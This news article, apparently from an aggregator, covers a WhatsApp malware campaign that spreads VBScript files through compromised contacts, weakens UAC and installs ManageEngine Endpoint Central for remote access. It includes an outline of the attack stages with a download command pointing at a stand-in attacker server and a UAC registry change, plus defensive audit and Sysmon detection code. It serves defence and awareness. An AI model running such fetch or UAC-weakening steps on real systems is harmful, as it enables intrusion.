WhatsApp Malware Storm: Trusted Contacts Become Unwitting Weapons in a Global Cyberattack + Video


A Dangerous New WhatsApp Campaign Turns Familiar Messages Into Cyber Traps

Introduction

WhatsApp has long been viewed as one of the safest and most trusted communication platforms in the world. Millions of people rely on it daily to exchange personal conversations, business documents, invoices, financial statements, and confidential information. That trust is exactly what cybercriminals are exploiting in a sophisticated malware campaign that has now spread across multiple continents.

Researchers have uncovered an ongoing attack operation targeting WhatsApp users through compromised accounts. Instead of sending suspicious links or obvious scam messages, attackers distribute files that appear to be legitimate business documents. Because these files arrive from trusted contacts, victims are far more likely to open them without hesitation.

What makes this campaign particularly alarming is its use of legitimate enterprise software to establish remote access. Rather than deploying obvious malware immediately, attackers cleverly install trusted system management tools that allow them to quietly take control of infected devices while avoiding detection.

A Global Campaign With Expanding Reach

According to cybersecurity researchers at Kaspersky, the campaign has already affected users across numerous countries including Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, Vietnam, and Malaysia.

The geographical diversity of the infections indicates a well-organized operation rather than a localized criminal effort. Attackers appear to be targeting both individuals and businesses, leveraging compromised WhatsApp accounts to spread malicious files through existing contact networks.

The global scale demonstrates how modern cybercriminals can rapidly expand their reach using social platforms that billions of people trust every day.

How the Attack Begins

The infection chain starts with a seemingly harmless message delivered through WhatsApp.

Victims receive a file attachment with names designed to resemble important business documents such as:

Financial reports

Billing statements

Account notifications

Payment records

Business invoices

Corporate documentation

To increase credibility, attackers localize file names into multiple languages. This customization significantly improves the chances that recipients will believe the file is legitimate and open it immediately.

Since the message often arrives from a familiar contact whose account has already been compromised, many users lower their guard and assume the attachment is safe.

Compromised Accounts Fuel the Spread

One of the most concerning aspects of this campaign is the abuse of legitimate WhatsApp accounts.

Researchers observed that attackers gained access to multiple user accounts and used those accounts to distribute malicious files directly to people listed in their contact lists.

This creates a powerful chain reaction. Every compromised account becomes a distribution hub capable of infecting friends, family members, coworkers, clients, and business partners.

Because trust is already established between sender and recipient, traditional social engineering barriers become significantly weaker.

Kaspersky researchers note that the exact technique used to compromise the WhatsApp accounts remains unknown at this time.

The Hidden VBScript Threat

The malicious attachment itself is a heavily obfuscated VBScript file.

VBScript has existed within Windows environments for decades and can execute commands through Windows Script Host. Attackers frequently abuse this capability because scripts can automate malicious actions without requiring sophisticated malware packages.

When the victim opens the file, the script silently contacts attacker-controlled infrastructure and downloads additional payloads required for the next stage of the infection.

The victim often sees little or no indication that malicious activity is occurring in the background.

Bypassing Windows Security Controls

After execution, the downloaded scripts begin modifying system settings.

One of the primary objectives is disabling or weakening User Account Control (UAC), a built-in Windows security mechanism designed to prevent unauthorized administrative actions.

The malware achieves this through Registry modifications that reduce the effectiveness of Windows protections.

By weakening these safeguards, attackers prepare the system for silent installation of additional software without attracting user attention.
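The registry values that govern UAC are few and well known, so a defender can audit them directly. The following is an added example, not code from the article or from Kaspersky: it checks a snapshot of the three UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (real value names; the snapshots below are constructed) and, on a Windows host, can read the live values with the standard winreg module.

```python
"""Audit the registry values that control User Account Control (UAC).

Added example, not code from the article or from Kaspersky. The key path
and value names are the real ones Windows uses; the two snapshot dicts
are constructed to show an intact posture and a weakened one.
"""
import sys

UAC_KEY_PATH = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"  # under HKLM

# Windows defaults when a value is absent: UAC on, prompt for non-Windows
# binaries (5), prompt on the secure desktop.
DEFAULTS = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}

# Constructed snapshots (what a registry export of the key might contain).
HARDENED_SNAPSHOT = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}
WEAKENED_SNAPSHOT = {"EnableLUA": 0, "ConsentPromptBehaviorAdmin": 0, "PromptOnSecureDesktop": 0}


def audit_uac(snapshot: dict) -> list:
    """Return a list of findings; an empty list means the UAC posture looks intact.

    Missing values fall back to the Windows defaults, so an empty key is not a finding.
    """
    findings = []
    values = {name: snapshot.get(name, default) for name, default in DEFAULTS.items()}
    if values["EnableLUA"] == 0:
        findings.append("EnableLUA=0: UAC is switched off; admin processes run fully elevated with no prompt")
    if values["ConsentPromptBehaviorAdmin"] == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: administrators are elevated silently, no consent dialog")
    if values["PromptOnSecureDesktop"] == 0:
        findings.append("PromptOnSecureDesktop=0: prompts appear on the normal desktop and can be overlaid or scripted")
    return findings


def read_live_snapshot() -> dict:
    """Read the same values from a running Windows host; returns {} on other platforms."""
    if sys.platform != "win32":
        return {}
    import winreg  # standard library, Windows only
    snapshot = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UAC_KEY_PATH) as key:
            for name in DEFAULTS:
                try:
                    value, _type = winreg.QueryValueEx(key, name)
                    snapshot[name] = value
                except FileNotFoundError:
                    pass  # absent value -> Windows default applies
    except FileNotFoundError:
        pass  # key itself absent -> all defaults apply
    return snapshot


if __name__ == "__main__":
    live = read_live_snapshot()
    target = live if live else WEAKENED_SNAPSHOT  # fall back to the constructed sample off Windows
    for finding in audit_uac(target) or ["no UAC weakening detected"]:
        print(finding)
```

Run the audit from a scheduled task or configuration-management check; any non-empty result on a workstation that should have default UAC settings is worth an alert, because a user rarely changes these values by hand.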

Legitimate Software Turned Into an Attack Tool

Perhaps the most fascinating element of the operation is the attackers’ choice of payload.

Instead of deploying a traditional remote access trojan immediately, the campaign downloads and installs ManageEngine Endpoint Central.

ManageEngine Endpoint Central is a legitimate enterprise management platform commonly used by IT departments to manage large numbers of systems from a centralized dashboard.

In normal circumstances, the software serves an important administrative role. However, cybercriminals are repurposing it as a covert remote-access mechanism.

Once installed, the application is configured to communicate with attacker-controlled servers, effectively granting remote administration privileges over the victim’s machine.

The result is a compromised system that appears to be running legitimate software while secretly providing full access to cybercriminals.

WhatsApp Desktop Users Face Additional Risk

Researchers identified an important distinction between WhatsApp Web and the desktop application.

When delivered through WhatsApp Web, users generally need to manually download the VBScript attachment before opening it.

However, within the desktop client, the file can be executed more directly through Windows Script Host (wscript.exe), potentially reducing friction in the attack process.

This subtle difference increases risk for users who regularly exchange documents through the desktop version of WhatsApp.

Possible Links to Known Malware Operations

While researchers stopped short of formally attributing the campaign to a specific threat group, several indicators attracted attention.

Investigators discovered traces suggesting Chinese-language usage within portions of the infrastructure and tooling.

Additionally, some infrastructure overlaps were observed with systems previously associated with ValleyRAT and Gh0st RAT operations.

Despite these findings, the evidence remains insufficient for definitive attribution.

Cybersecurity attribution requires a high degree of confidence, and current data does not conclusively identify the individuals or organization behind the campaign.

Why This Attack Is Especially Effective

Traditional phishing campaigns often fail because recipients recognize suspicious links or poorly written messages.

This campaign succeeds by exploiting three powerful psychological factors:

Trust in personal contacts.

Familiar business-related document names.

Legitimate software used as a malicious tool.

These elements combine to create a highly convincing attack chain that bypasses many users’ instincts for detecting cyber threats.

The use of genuine administration software also helps attackers blend into normal enterprise environments where such tools are commonly deployed.

How Users Can Protect Themselves

The most effective defense begins with skepticism.

Even when a file arrives from a trusted friend, colleague, or family member, users should verify unexpected attachments through a secondary communication channel before opening them.

Additional safety recommendations include:

Maintain updated antivirus protection.

Avoid opening VBS files received through messaging applications.

Keep Windows security features enabled.

Apply operating system updates regularly.

Use endpoint protection capable of detecting suspicious administrative tools.

Enable multi-factor authentication wherever possible.

Monitor systems for unexpected remote management software installations.

Cybercriminals increasingly rely on social trust rather than technical exploits alone, making user awareness a critical layer of defense.

Deep Analysis: Technical Breakdown of the Infection Chain

The attack demonstrates a classic multi-stage intrusion model combined with living-off-the-land techniques.

Stage 1:

wscript.exe malicious_file.vbs

Stage 2:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies

Stage 3:

Invoke-WebRequest -Uri attacker-server

Stage 4:

EndpointCentral.exe /silent

Stage 5:

Get-Service

Stage 6:

netstat -ano

Stage 7:

Get-Process

From a defensive perspective, organizations should monitor:

Sysmon Event ID 1

Sysmon Event ID 3

Sysmon Event ID 13

Security teams should also hunt for unusual executions of:

wscript.exe

cscript.exe

powershell.exe

reg.exe

mshta.exe

Linux-based threat hunting teams can review suspicious outbound connections using:

netstat -tulpn
ss -tulpn
lsof -i
journalctl -xe

Enterprise defenders should deploy detection rules for:

Endpoint management software installed unexpectedly

Remote management connections to unknown servers

Registry modifications affecting UAC

VBScript execution from messaging applications

The campaign highlights a growing trend where attackers abandon noisy malware in favor of legitimate administrative tools.

This approach significantly reduces detection rates because many security products are configured to trust recognized software vendors.

Another notable characteristic is the use of compromised social identities as distribution mechanisms. Rather than attacking organizations directly, criminals exploit human relationships and communication habits.

The operational model resembles advanced social engineering combined with enterprise-level persistence tactics.

Detection becomes difficult because every stage appears legitimate when viewed individually.

A trusted contact sends a file.

Windows executes a script.

A known software package is installed.

Remote management traffic begins.

Viewed separately, each action may appear harmless.

Viewed together, they reveal a carefully orchestrated compromise.

Security teams should therefore focus on behavioral correlations rather than individual indicators.
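The Sysmon guidance above (Event IDs 1, 3 and 13, and the four detection rules) and the correlation principle in this paragraph can be turned into one rule set. The following is an added example, not code from the article or from Kaspersky: it labels individual Sysmon-style events (a script host spawned by a messaging client, a UAC value set to 0, a silent endpoint-management install, management traffic to a server outside the allowlist) and only raises a high-severity incident when two or more distinct stages land on the same host inside a time window. Field names follow Sysmon's schema; the hostnames, paths, process names of the messaging clients, the allowlisted server and the IP addresses are constructed assumptions.

```python
"""Correlate Sysmon events (IDs 1, 3, 13) into one behavioural alert.

Added example, not code from the article or from Kaspersky. The events
below are constructed; field names follow Sysmon (Image, ParentImage,
CommandLine, TargetObject, Details, DestinationIp), values are made up.
"""
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
MESSAGING_APPS = {"whatsapp.exe", "telegram.exe", "signal.exe"}   # assumed client process names
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}
ENDPOINT_MGMT_MARKERS = {"endpointcentral", "manageengine"}
KNOWN_MGMT_SERVERS = {"10.0.5.20"}   # constructed: the organisation's own management server
WINDOW = timedelta(minutes=30)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict):
    """Label one event with the stage it represents, or None if it is unremarkable."""
    eid = ev["EventID"]
    if eid == 1:  # process creation
        cmd = ev.get("CommandLine", "").lower()
        if basename(ev["Image"]) in SCRIPT_HOSTS and basename(ev.get("ParentImage", "")) in MESSAGING_APPS:
            return "script_from_messaging_app"
        if any(m in cmd for m in ENDPOINT_MGMT_MARKERS) and "/silent" in cmd:
            return "silent_endpoint_mgmt_install"
    elif eid == 13:  # registry value set
        target = ev["TargetObject"].lower()
        if "policies\\system\\" in target and target.rsplit("\\", 1)[-1] in UAC_VALUES \
                and "0x00000000" in ev.get("Details", ""):
            return "uac_weakened"
    elif eid == 3:  # network connection
        image = ev["Image"].lower()
        if any(m in image for m in ENDPOINT_MGMT_MARKERS) and ev["DestinationIp"] not in KNOWN_MGMT_SERVERS:
            return "mgmt_traffic_to_unknown_server"
    return None


def correlate(events: list) -> list:
    """Group labelled events per host; >= 2 distinct stages inside WINDOW is one high-severity incident."""
    by_host = {}
    for ev in events:
        label = classify(ev)
        if label:
            ts = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")
            by_host.setdefault(ev["Computer"], []).append((ts, label))
    incidents = []
    for host, seq in by_host.items():
        seq.sort()
        first_ts = seq[0][0]
        stages = sorted({label for ts, label in seq if ts - first_ts <= WINDOW})
        incidents.append({"host": host, "severity": "high" if len(stages) >= 2 else "low", "stages": stages})
    return incidents


# Constructed sample: one workstation showing the full chain, one showing benign look-alikes.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-FINANCE-07", "UtcTime": "2024-01-01 09:00:05",
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Users\ana\AppData\Local\WhatsApp\WhatsApp.exe",
     "CommandLine": r'wscript.exe "C:\Users\ana\Downloads\Factura_Enero.vbs"'},
    {"EventID": 13, "Computer": "WS-FINANCE-07", "UtcTime": "2024-01-01 09:00:41",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Computer": "WS-FINANCE-07", "UtcTime": "2024-01-01 09:02:10",
     "Image": r"C:\Users\ana\AppData\Local\Temp\EndpointCentral.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"EndpointCentral.exe /silent"},
    {"EventID": 3, "Computer": "WS-FINANCE-07", "UtcTime": "2024-01-01 09:05:33",
     "Image": r"C:\Program Files\ManageEngine\EndpointCentral\agent.exe",   # constructed path
     "DestinationIp": "203.0.113.45", "DestinationPort": 8383},
    # Benign: IT's own agent talking to the allowlisted corporate server.
    {"EventID": 3, "Computer": "WS-IT-02", "UtcTime": "2024-01-01 09:06:00",
     "Image": r"C:\Program Files\ManageEngine\EndpointCentral\agent.exe",
     "DestinationIp": "10.0.5.20", "DestinationPort": 8383},
    # Benign: a logon script launched from Explorer, not from a messaging client.
    {"EventID": 1, "Computer": "WS-IT-02", "UtcTime": "2024-01-01 09:07:00",
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Scripts\logon.vbs"'},
]

if __name__ == "__main__":
    for incident in correlate(SAMPLE_EVENTS):
        print(incident)
```

Each single label is a weak signal on its own (script hosts, reg.exe and management agents all run legitimately every day); the point of the example is that the severity comes from the combination on one host within the window, which is exactly the "viewed together" correlation the article recommends.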

Future attacks will likely continue blending legitimate tools, trusted communication channels, and social engineering techniques to evade traditional security controls.

The campaign serves as another reminder that modern cyberattacks increasingly target human trust instead of software vulnerabilities.

What Undercode Says:

The most dangerous aspect of this operation is not the malware itself.

It is the weaponization of trust.

For years, cybersecurity awareness programs focused heavily on suspicious links and malicious email attachments.

Attackers have adapted.

They now understand that people trust messages from friends more than messages from strangers.

WhatsApp has become a valuable attack surface because it combines instant communication with high levels of user confidence.

A message from a colleague is rarely questioned.

A financial report from a known contact appears routine.

That assumption creates the perfect attack opportunity.

The use of VBScript is also noteworthy.

Many organizations focus on PowerShell monitoring while legacy scripting engines receive less scrutiny.

Threat actors frequently exploit these blind spots.

The installation of ManageEngine Endpoint Central reveals another evolution in attacker methodology.

Instead of fighting security products, attackers increasingly work alongside them.

Legitimate software provides camouflage.

Security alerts become less likely.

Incident responders require more time to identify malicious activity.

The campaign further demonstrates how compromised accounts can generate exponential infection growth.

Every successful compromise creates additional trusted distribution points.

The attack therefore scales naturally.

Another significant concern involves attribution.

The presence of Chinese-language indicators and infrastructure overlaps should not automatically lead to conclusions.

Cybercriminals routinely plant false indicators.

Attribution requires extensive evidence beyond language artifacts.

Organizations should focus on defense rather than speculation.

The technical sophistication of the campaign lies not in advanced malware development but in operational design.

Each component serves a strategic purpose.

Social engineering gains execution.

Scripts establish persistence.

Registry modifications reduce resistance.

Legitimate software provides remote access.

Together they create a remarkably efficient intrusion framework.

Future campaigns will likely expand this model.

Messaging applications will increasingly become primary malware delivery channels.

Traditional email security gateways cannot protect users from attacks originating within private messaging ecosystems.

Security awareness training must evolve accordingly.

The lesson is simple.

Trust should never replace verification.

Even the most familiar contact can become an unwitting participant in a cyberattack.

✅ Kaspersky researchers reported a malware campaign spreading through compromised WhatsApp accounts using malicious VBScript attachments.

✅ The attack chain involves downloading additional scripts, modifying Windows settings, and installing ManageEngine Endpoint Central for remote administration access.

✅ Researchers identified infrastructure overlaps with activity previously associated with ValleyRAT and Gh0st RAT, but publicly available evidence remains insufficient for definitive attribution to a specific threat actor.

Prediction

(+1) Messaging platforms will become a primary battleground for malware distribution over the next few years as attackers discover that trust-based delivery dramatically improves infection success rates. 📈

(+1) Endpoint detection vendors will increase monitoring of legitimate administration tools and remote management platforms that are increasingly abused during intrusions. 🛡️

(+1) Organizations will expand security awareness programs beyond email and begin training employees to verify unexpected files received through WhatsApp, Telegram, Signal, and other messaging applications. 🚀

(-1) Threat actors will continue abusing trusted contacts and legitimate software, making future attacks harder to distinguish from normal business activity.

(-1) Traditional antivirus solutions alone may struggle against campaigns that rely heavily on social engineering and legitimate enterprise tools rather than conventional malware signatures.

(-1) Without stronger verification practices, compromised messaging accounts could become one of the fastest-growing initial access vectors for both cybercriminal groups and advanced persistent threat operators. ⚠️


References:

Reported By: www.bleepingcomputer.com